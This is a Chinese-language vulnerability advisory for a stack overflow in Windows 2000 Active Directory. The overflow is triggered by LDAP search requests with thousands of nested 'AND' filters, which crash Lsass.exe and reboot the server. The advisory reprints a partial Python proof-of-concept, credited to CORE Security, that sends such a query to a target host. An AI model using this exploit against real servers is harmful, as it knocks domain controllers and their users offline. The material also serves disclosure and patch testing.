涉及程序:
Win2k Active Directory
描述:
Microsoft Windows 活动目录远程堆栈溢出缺陷
详细:
Windows Active Directory(活动目录)是Windows 2000结构的重要组件,是Microsoft提供的强大的目录服务系统 。
Windows活动目录的LDAP 3搜索请求功能对用户提交请求缺少正确缓冲区边界检查,远程攻击者可利用此缺陷使Lsass.exe服务崩溃,触发缓冲区溢出 。
【Microsoft Windows 活动目录远程堆栈溢出缺陷】通过活动目录提供的目录服务基于LDAP协议和并使用协议存储和获得Active目录对象 。活动目录中使用LDAP 3的"search request"请求功能存在问题,攻击者如果构建超过1000个"AND"的请求,并发送给服务器,可导致触发堆栈溢出,使Lsass.exe服务崩溃,系统会在30秒内重新启动 。
攻击方法:
CORE Security TechnologIEs Advisories (advisories@coresecurity.com)提供了如下测试方法:
下面是一段Python测试脚本:
------------------------------------
class ActiveDirectoryDos( Ldap ):
def __init__(self):
self._s = None
self.host = "192.168.0.1"
self.basedn = "dc=bugweek,dc=corelabs,dc=core-sdi,dc=com"
self.port = 389
self.buffer = ""
self.msg_id = 1
Ldap.__init__()
def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode()asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer
def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffersimpleBinOp )
return filterBuffer
def searchSub( self, filterBuffer ):
self.bindRequest()
self.searchRequest( filterBuffer )
def run(self, host = "", basedn = "", name = "" ):
# the Machine must not exist
machine_name = "xaxax"
filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,"name",machine_name)
# execute the anonymous query
print "executing query"
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )
推荐阅读
- windows2000下dns和活动目录关系浅析
- 打造windows XP/2003万能GHOST
- 设置windows 2003的本地策略应用
- 对Windows Server 2003中安装的终端服务的更改
- 2 通过.NET Framework访问活动目录
- Windows Server 2003 中使用设备管理器来配置设备
- 让windows 2003轻松识别外来设备
- microsoft edge打不开网页
- 如何在 Windows中禁用 DCOM支持
- 改变windows 2003登录方式